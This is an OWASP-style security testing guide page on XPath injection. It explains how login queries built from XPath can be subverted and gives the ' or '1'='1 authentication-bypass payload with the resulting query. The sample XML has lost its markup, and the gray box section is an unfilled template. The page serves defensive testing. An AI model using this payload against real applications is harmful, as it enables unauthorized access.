Testing for XPath Injection (OTG-INPVAL-010)

Brief Summary
XPath is a language that has been designed and developed to operate on data that is described with XML. The XPath injection allows an attacker in inject XPath elements in a query that uses this language in order to. Some of the possible goals are to bypass authentication or access information in an unauthorized fashion.

Short Description of the Issue (Topic and Explanation)
Web applications heavily use databases to store and access the data they need for their operations. Since the dawn of the Internet, relational databases have been by far the most common paradigm, but in the last years we are witnessing an increasing popularity for databases that organize data using the XML language. Just like relational databases are accessed with the SQL language, XML databases use XPath, which is their standard interrogation language. Since from a conceptual point of view, XPath is very similar to SQL in its purpose and applications, an interesting result is that also XPath injection attacks follow the same logic of SQL Injection ones. In some aspects, XPath is even more powerful than standard SQL, as its whole power is already present in its specifications, whereas a large slice of the techniques that can be used in a SQL Injection attack leverages the peculiarities of the SQL dialect used by the target database. This means that XPath injection attacks can be much more adaptable and ubiquitous. Another advantage of an XPath injection attack is that, unlike SQL, there are not ACLs enforced, as our query can access every part of the XML document.

Black Box testing and example
The attack pattern was first published by Amit Klein (see References at the bottom of the page) and is very similar to the usual SQL Injection. In order to get a first grasp of the problem, let's imagine a login page that manages the authentication to an application in which the user must enter his/her username and password. Let's assume that our database is represented by the following xml file:  gandalf !c3 admin Stefan0 w1s3c guest tony Un6R34kb!e guest An XPath query that returns the account whose username is "gandalf" and the password is "!c3" would be the following: string(//user[username/text='gandalf' and password/text='!c3']/account/text) If the application does not properly filter such input, the attacker will be able to inject XPath code and interfere with the query result. For instance, the attacker could input the following values: Username: ' or '1' = '1 Password: ' or '1' = '1 Looks quite familiar, doesn't it ? Using these parameters, the query becomes: string(//user[username/text= or '1' = '1' and password/text= or '1' = '1']/account/text) As in a common SQL Injection attack, we have created a query that is always evaluated as true, which means that the application will authenticate the user even if a username or a password have not been provided.

And as in a common SQL Injection attack, also in the case of XPath inhection the first step is to insert a single quote (') in the field to be tested, introducing a syntax error in the query and check whether the application returns an error message.

If there is no knowledge about the XML data internal details and if the application does not provide useful error messages that help us in reconstruct its internal logic, it is possible to perform a fully blind attack whose goal is to reconstruct the whole data structure. The technique is similar to inference based SQL Injection, as the approach is to inject code that creates a query that returns one bit of information. Also this technique is explained in more detail by Amit Klein in the referenced paper.

Gray Box testing and example
Testing for Topic X vulnerabilities: ... Result Expected: ...